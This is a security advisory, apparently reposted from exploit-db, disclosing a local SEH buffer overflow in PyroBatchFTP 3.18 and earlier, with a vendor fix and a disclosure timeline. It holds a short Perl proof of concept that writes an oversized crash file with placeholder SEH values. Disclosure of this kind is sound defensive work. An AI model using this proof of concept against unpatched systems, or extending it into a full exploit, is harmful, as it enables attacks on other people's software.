PyroBatchFTP < 3.19 - Buffer Overflow

  • 作者: Manuel García Cárdenas
    日期: 2018-01-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43548/
  • =============================================
    MGC ALERT 2018-001
    - Original release date: December 22, 2017
    - Last revised:January 12, 2018
    - Discovered by: Manuel García Cárdenas
    - Severity: 7,5/10 (CVSS Base Score)
    =============================================
    
    I. VULNERABILITY
    -------------------------
    PyroBatchFTP <= 3.18 - Local Buffer Overflow (SEH)
    
    II. BACKGROUND
    -------------------------
    PyroBatchFTP is a Windows software that lets you exchange files with FTP,
    FTPS or SFTP servers in an automatic and unattended way, using a simple yet
    powerful batch/script language.
    
    III. DESCRIPTION
    -------------------------
    The Enterprise version of PyroBatchFTP is affected by a Local Buffer
    Overflow vulnerability.
    
    The application does not check bounds when reading the file that will
    execute the script, resulting in a classic Buffer Overflow overwriting SEH
    handler.
    
    To exploit the vulnerability only is needed create a local script to
    interact with the application.
    
    IV. PROOF OF CONCEPT
    -------------------------
    
    my $file= "crash.cmd";
    my $junk= "A" x 2052;
    my $nseh = "BBBB";
    my $seh = "CCCC";
    open($FILE,">$file");
    print $FILE $junk.$nseh.$seh;
    close($FILE);
    print "File Created successfully\n";
    
    V. BUSINESS IMPACT
    -------------------------
    Availability compromise can result from these attacks.
    
    VI. SYSTEMS AFFECTED
    -------------------------
    PyroBatchFTP <= 3.18
    
    VII. SOLUTION
    -------------------------
    Vendor release 3.19 version
    http://www.emtec.com/downloads/pyrobatchftp/pyrobatchftp319_changes.txt
    
    VIII. REFERENCES
    -------------------------
    https://www.emtec.com/pyrobatchftp/index.html
    
    IX. CREDITS
    -------------------------
    This vulnerability has been discovered and reported
    by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
    
    X. REVISION HISTORY
    -------------------------
    December 22, 2017 1: Initial release
    January 12, 2018 2: Revision to send to lists
    
    XI. DISCLOSURE TIMELINE
    -------------------------
    December 22, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
    December 22, 2017 2: Send to vendor
    January 12, 2018 3: Vendor fix the vulnerability and release a new version
    January 12, 2018 4: Send to the Full-Disclosure lists
    
    XII. LEGAL NOTICES
    -------------------------
    The information contained within this advisory is supplied "as-is" with no
    warranties or guarantees of fitness of use or otherwise.
    
    XIII. ABOUT
    -------------------------
    Manuel Garcia Cardenas
    Pentester